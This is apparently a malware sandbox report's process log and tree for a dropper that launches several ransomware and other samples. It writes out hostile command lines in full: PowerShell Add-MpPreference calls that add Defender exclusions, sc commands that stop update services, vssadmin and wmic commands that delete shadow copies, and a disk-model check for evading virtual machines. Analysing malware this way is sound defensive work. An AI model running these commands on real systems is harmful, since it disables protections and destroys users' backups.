PID 1204 wrote to memory of 2692	1204	PCCooker_x64.exe	32
PID 1204 wrote to memory of 2692	1204	PCCooker_x64.exe	32
PID 1204 wrote to memory of 2708	1204	PCCooker_x64.exe	33
PID 1204 wrote to memory of 2708	1204	PCCooker_x64.exe	33
PID 1204 wrote to memory of 2708	1204	PCCooker_x64.exe	33
PID 1204 wrote to memory of 2708	1204	PCCooker_x64.exe	33
PID 1204 wrote to memory of 3032	1204	PCCooker_x64.exe	34
PID 1204 wrote to memory of 3032	1204	PCCooker_x64.exe	34
PID 1204 wrote to memory of 3032	1204	PCCooker_x64.exe	34
PID 1204 wrote to memory of 3032	1204	PCCooker_x64.exe	34
PID 1204 wrote to memory of 2592	1204	PCCooker_x64.exe	35
PID 1204 wrote to memory of 2592	1204	PCCooker_x64.exe	35
PID 1204 wrote to memory of 2592	1204	PCCooker_x64.exe	35
PID 1204 wrote to memory of 2592	1204	PCCooker_x64.exe	35
PID 2708 wrote to memory of 2620	2708	asena.exe	36
PID 2708 wrote to memory of 2620	2708	asena.exe	36
PID 2708 wrote to memory of 2620	2708	asena.exe	36
PID 2708 wrote to memory of 2620	2708	asena.exe	36
PID 2708 wrote to memory of 3024	2708	asena.exe	39
PID 2708 wrote to memory of 3024	2708	asena.exe	39
PID 2708 wrote to memory of 3024	2708	asena.exe	39
PID 2708 wrote to memory of 3024	2708	asena.exe	39
PID 2592 wrote to memory of 2292	2592	CryptoWall.exe	38
PID 2592 wrote to memory of 2292	2592	CryptoWall.exe	38
PID 2592 wrote to memory of 2292	2592	CryptoWall.exe	38
PID 2592 wrote to memory of 2292	2592	CryptoWall.exe	38
PID 2292 wrote to memory of 1308	2292	explorer.exe	44
PID 2292 wrote to memory of 1308	2292	explorer.exe	44
PID 2292 wrote to memory of 1308	2292	explorer.exe	44
PID 2292 wrote to memory of 1308	2292	explorer.exe	44
PID 2292 wrote to memory of 1572	2292	explorer.exe	45
PID 2292 wrote to memory of 1572	2292	explorer.exe	45
PID 2292 wrote to memory of 1572	2292	explorer.exe	45
PID 2292 wrote to memory of 1572	2292	explorer.exe	45
PID 2816 wrote to memory of 776	2816	4363463463464363463463463.exe	47
PID 2816 wrote to memory of 776	2816	4363463463464363463463463.exe	47
PID 2816 wrote to memory of 776	2816	4363463463464363463463463.exe	47
PID 2816 wrote to memory of 776	2816	4363463463464363463463463.exe	47
PID 3032 wrote to memory of 1944	3032	Bomb.exe	48
PID 3032 wrote to memory of 1944	3032	Bomb.exe	48
PID 3032 wrote to memory of 1944	3032	Bomb.exe	48
PID 3032 wrote to memory of 1576	3032	Bomb.exe	49
PID 3032 wrote to memory of 1576	3032	Bomb.exe	49
PID 3032 wrote to memory of 1576	3032	Bomb.exe	49
PID 3032 wrote to memory of 1448	3032	Bomb.exe	50
PID 3032 wrote to memory of 1448	3032	Bomb.exe	50
PID 3032 wrote to memory of 1448	3032	Bomb.exe	50
PID 3032 wrote to memory of 2104	3032	Bomb.exe	51
PID 3032 wrote to memory of 2104	3032	Bomb.exe	51
PID 3032 wrote to memory of 2104	3032	Bomb.exe	51
PID 3032 wrote to memory of 856	3032	Bomb.exe	52
PID 3032 wrote to memory of 856	3032	Bomb.exe	52
PID 3032 wrote to memory of 856	3032	Bomb.exe	52
PID 3032 wrote to memory of 1760	3032	Bomb.exe	53
PID 3032 wrote to memory of 1760	3032	Bomb.exe	53
PID 3032 wrote to memory of 1760	3032	Bomb.exe	53
PID 3032 wrote to memory of 2044	3032	Bomb.exe	54
PID 3032 wrote to memory of 2044	3032	Bomb.exe	54

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\PCCooker_x64.exe
"C:\Users\Admin\AppData\Local\Temp\PCCooker_x64.exe"
1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1204
- C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
  "C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2816
- - C:\Users\Admin\AppData\Local\Temp\Files\npp.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\npp.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:776
  - - C:\Users\Admin\AppData\Local\Temp\305268027.exe
      C:\Users\Admin\AppData\Local\Temp\305268027.exe
      4⤵
      Executes dropped EXE
      PID:3684
    - - C:\Windows\syscapvbrd.exe
        
        C:\Windows\syscapvbrd.exe
        5⤵
        
        PID:3112
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
        6⤵
        
        PID:5128
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
        7⤵
        
        PID:2364
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS
        6⤵
        
        PID:3264
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop UsoSvc
        7⤵
        Launches sc.exe
        
        PID:6608
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop WaaSMedicSvc
        7⤵
        Launches sc.exe
        
        PID:6692
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop wuauserv
        7⤵
        Launches sc.exe
        
        PID:2184
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop DoSvc
        7⤵
        Launches sc.exe
        
        PID:6872
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop BITS
        7⤵
        Launches sc.exe
        
        PID:5296
- - C:\Users\Admin\AppData\Local\Temp\Files\o.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\o.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:2408
  - - C:\Windows\sysmablsvr.exe
      C:\Windows\sysmablsvr.exe
      4⤵
      Modifies security service
      Windows security bypass
      Executes dropped EXE
      Windows security modification
      PID:2444
- - C:\Users\Admin\AppData\Local\Temp\Files\Pichon.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\Pichon.exe"
    3⤵
    PID:4356
  - - C:\Windows\system32\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\Loli169.bat" "
      4⤵
      PID:5664
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic diskdrive get Model
        5⤵
        
        PID:5716
    - - C:\Windows\system32\findstr.exe
        
        findstr /i "DADY HARDDISK QEMU HARDDISK WDC WDS100T2B0A"
        5⤵
        
        PID:4352
- C:\Users\Admin\AppData\Local\Temp\a76e49df84ba2a7b33e8ea959995b5e6faecb90d551ef169d8272ce9042c35a5.exe
  "C:\Users\Admin\AppData\Local\Temp\a76e49df84ba2a7b33e8ea959995b5e6faecb90d551ef169d8272ce9042c35a5.exe"
  2⤵
  - Executes dropped EXE
  PID:2692
- C:\Users\Admin\AppData\Local\Temp\asena.exe
  "C:\Users\Admin\AppData\Local\Temp\asena.exe"
  2⤵
  - Executes dropped EXE
  - Enumerates connected drives
  - Writes to the Master Boot Record (MBR)
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2708
- - C:\Windows\System32\Wbem\wmic.exe
    wmic.exe shadowcopy delete
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2620
- - C:\Windows\system32\vssadmin.exe
    vssadmin delete shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:3024
- - C:\Windows\SysWOW64\notepad.exe
    C:\Users\Public\Documents\RGNR_B43B6AEC.txt
    3⤵
    - Opens file in notepad (likely ransom note)
    PID:7488
- C:\Users\Admin\AppData\Local\Temp\Bomb.exe
  "C:\Users\Admin\AppData\Local\Temp\Bomb.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3032
- - C:\Users\Admin\AppData\Local\Temp\25.exe
    "C:\Users\Admin\AppData\Local\Temp\25.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:1944
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\25.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4752
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '25.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:5900
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\$77-system32'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:8000
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-system32'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:5844
- - C:\Users\Admin\AppData\Local\Temp\24.exe
    "C:\Users\Admin\AppData\Local\Temp\24.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:1576
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\24.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4780
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '24.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:5452
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\$77-system32'
      4⤵
      PID:6036
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-system32'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:3680
- - C:\Users\Admin\AppData\Local\Temp\23.exe
    "C:\Users\Admin\AppData\Local\Temp\23.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:1448
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\23.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:3356
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '23.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:7148
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\$77-system32'
      4⤵
      PID:5284
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-system32'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:6928
- - C:\Users\Admin\AppData\Local\Temp\22.exe
    "C:\Users\Admin\AppData\Local\Temp\22.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2104
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\22.exe'
      4⤵
      PID:4208
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '22.exe'
      4⤵
      PID:3816
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\$77-system32'
      4⤵
      PID:6584
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-system32'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:3076
- - C:\Users\Admin\AppData\Local\Temp\21.exe
    "C:\Users\Admin\AppData\Local\Temp\21.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:856
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\21.exe'
      4⤵
      PID:4148
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '21.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:1876
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\$77-system32'
      4⤵
      PID:3332
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-system32'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4104
- - C:\Users\Admin\AppData\Local\Temp\20.exe
    "C:\Users\Admin\AppData\Local\Temp\20.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:1760
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\20.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4424
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '20.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:5640
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\$77-system32'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:5748
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-system32'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:5476
- - C:\Users\Admin\AppData\Local\Temp\19.exe
    "C:\Users\Admin\AppData\Local\Temp\19.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2044
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\19.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:1228
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '19.exe'
      4⤵
      PID:4860
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\$77-system32'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:6176
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-system32'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:3640
- - C:\Users\Admin\AppData\Local\Temp\18.exe
    "C:\Users\Admin\AppData\Local\Temp\18.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:1884
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\18.exe'
      4⤵
      PID:4396
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '18.exe'
      4⤵
      PID:5144
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\$77-system32'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:5976
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-system32'
      4⤵
      PID:5204
- - C:\Users\Admin\AppData\Local\Temp\17.exe
    "C:\Users\Admin\AppData\Local\Temp\17.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2992
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\17.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:3736
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '17.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:5408
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\$77-system32'
      4⤵
      PID:7432
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-system32'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:3176
- - C:\Users\Admin\AppData\Local\Temp\16.exe
    "C:\Users\Admin\AppData\Local\Temp\16.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:1528
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\16.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4240
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '16.exe'
      4⤵
      PID:5808
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\$77-system32'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:5116
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-system32'
      4⤵
      PID:7960
- - C:\Users\Admin\AppData\Local\Temp\15.exe
    "C:\Users\Admin\AppData\Local\Temp\15.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2680
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\15.exe'
      4⤵
      PID:4296
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '15.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:5676
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\$77-system32'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:1472
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-system32'
      4⤵
      PID:5376
- - C:\Users\Admin\AppData\Local\Temp\14.exe
    "C:\Users\Admin\AppData\Local\Temp\14.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2580
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\14.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4372
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '14.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4968
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\$77-system32'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4992
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-system32'
      4⤵
      PID:1804
- - C:\Users\Admin\AppData\Local\Temp\13.exe
    "C:\Users\Admin\AppData\Local\Temp\13.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2604
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\13.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4412
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '13.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4776
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\$77-system32'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4316
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-system32'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:3080
- - C:\Users\Admin\AppData\Local\Temp\12.exe
    "C:\Users\Admin\AppData\Local\Temp\12.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2844
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\12.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:3508
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '12.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:5428
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\$77-system32'
      4⤵
      PID:4404
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-system32'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:5252
- - C:\Users\Admin\AppData\Local\Temp\11.exe
    "C:\Users\Admin\AppData\Local\Temp\11.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2644
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\11.exe'
      4⤵
      PID:4756
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '11.exe'
      4⤵
      PID:3740
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\$77-system32'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:3724
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-system32'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:1772
- - C:\Users\Admin\AppData\Local\Temp\10.exe
    "C:\Users\Admin\AppData\Local\Temp\10.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:588
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\10.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4764
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '10.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:5424
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\$77-system32'
      4⤵
